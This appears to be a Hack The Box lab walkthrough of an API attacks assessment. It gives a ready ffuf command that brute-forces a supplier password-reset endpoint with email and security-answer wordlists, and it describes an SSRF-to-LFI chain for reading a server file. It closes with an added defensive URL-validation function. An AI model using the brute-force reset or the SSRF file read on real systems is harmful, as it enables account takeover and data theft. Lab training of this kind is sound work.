
Hack The Box: API Attacks Skill Assessment Walkthrough

May 3, 2026
11:48

Walkthrough of the API Attacks Skill Assessment on Hack The Box.

ffuf script used:

ffuf -u '/api/v2/authentication/suppliers/passwords/resets/security-question-answers' -X 'POST' -H 'accept: application/json' -H 'Content-Type: application/json' -d '{ "SupplierEmail": "EMAIL", "SecurityQuestionAnswer": "COLOUR", "NewPassword": "Test1234" }' -w colors.txt:COLOUR -w emails.txt:EMAIL -ic -fr 'false'

This skill assessment applies the concepts covered in the module to retrieve the flag stored in file.txt on the target server. To accomplish this, we exploit a chained vulnerability, leveraging SSRF (Server-Side Request Forgery) to achieve LFI (Local File Inclusion). By manipulating the server's HTTP client into fetching a local file path rather than a remote URL, we are able to read the file's contents directly from the server's filesystem.
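The SSRF-to-LFI chain described above works only when the server passes a client-supplied URL to its HTTP client without checking it. The following is an added example, not code from the video or from Hack The Box, of a server-side check that would stop it; the function name, the allow-listed host `cdn.example.com`, and the two offline resolvers are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"cdn.example.com"}  # hypothetical allow-list (assumption)


def check_fetch_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason) for a client-supplied URL before the server fetches it."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        # file://, ftp://, gopher:// and scheme-less paths stop here
        return False, "scheme not allowed"
    host = parts.hostname or ""
    if not host or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    try:
        infos = resolver(host, port or (443 if parts.scheme == "https" else 80))
    except OSError:
        return False, "host does not resolve"
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved:
            return False, "resolves to internal address"
    return True, "ok"


# Constructed resolvers so the example runs offline (not real DNS answers).
def public_resolver(host, port):
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port))]


def loopback_resolver(host, port):
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("127.0.0.1", port))]


if __name__ == "__main__":
    for u in ("file:///path/to/file.txt", "http://localhost/", "https://cdn.example.com/a.png"):
        print(u, check_fetch_url(u, public_resolver))
    print(check_fetch_url("https://cdn.example.com/a.png", loopback_resolver))
```

The fetch itself should connect to the address that was validated and refuse redirects, otherwise a second DNS lookup or a 3xx response can bypass the check.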
